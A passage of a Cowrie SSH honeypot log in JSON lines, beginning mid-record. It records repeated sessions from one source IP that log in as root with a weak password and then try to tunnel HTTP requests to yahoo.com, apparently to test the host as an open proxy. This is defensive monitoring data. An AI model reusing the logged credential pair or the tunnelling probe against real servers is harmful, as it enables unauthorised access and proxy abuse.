sh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.942794Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.178468Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21369,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21369","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.226647Z","session":"1be8fdbd4332"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.273957Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18933,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18933","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.409480Z","session":"1be8fdbd4332"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.456648Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.504652Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2249,"dst_ip":"1.2.3.4","dst_port":22,"session":"10a675c6c554","protocol":"ssh","message":"New connection: 213.209.150.239:2249 (1.2.3.4:22) [session: 10a675c6c554]","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.550639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.551924Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.599096Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.833354Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17576,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17576","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.881172Z","session":"10a675c6c554"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:55.928325Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3234,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3234","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.065454Z","session":"10a675c6c554"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.112563Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.160238Z","src_ip":"213.209.150.239","session":"10a675c6c554"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2301,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead574176cc1","protocol":"ssh","message":"New connection: 213.209.150.239:2301 (1.2.3.4:22) [session: ead574176cc1]","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.206413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.207109Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.254475Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.488896Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4651,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4651","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.536909Z","session":"ead574176cc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.584012Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":15379,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15379","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.721550Z","session":"ead574176cc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.768672Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.816844Z","src_ip":"213.209.150.239","session":"ead574176cc1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2344,"dst_ip":"1.2.3.4","dst_port":22,"session":"318591045560","protocol":"ssh","message":"New connection: 213.209.150.239:2344 (1.2.3.4:22) [session: 318591045560]","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.862849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.863916Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:56.911109Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.145893Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24237,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24237","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.194684Z","session":"318591045560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.241910Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":32615,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32615","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.377463Z","session":"318591045560"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.424494Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.472592Z","src_ip":"213.209.150.239","session":"318591045560"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2385,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eec466341ca","protocol":"ssh","message":"New connection: 213.209.150.239:2385 (1.2.3.4:22) [session: 9eec466341ca]","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.518999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.519603Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.566963Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.801974Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29277,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29277","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.849965Z","session":"9eec466341ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:57.897257Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2401,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2401","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.033842Z","session":"9eec466341ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.081380Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.129789Z","src_ip":"213.209.150.239","session":"9eec466341ca"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2442,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fa24aa6f1e2","protocol":"ssh","message":"New connection: 213.209.150.239:2442 (1.2.3.4:22) [session: 1fa24aa6f1e2]","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.185422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.188137Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.244871Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.527061Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2114,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2114","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.584629Z","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.641336Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":28768,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28768","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.795090Z","session":"1fa24aa6f1e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:58.851841Z","src_ip":"213.209.150.239","session":"1fa24aa6f1e2"}
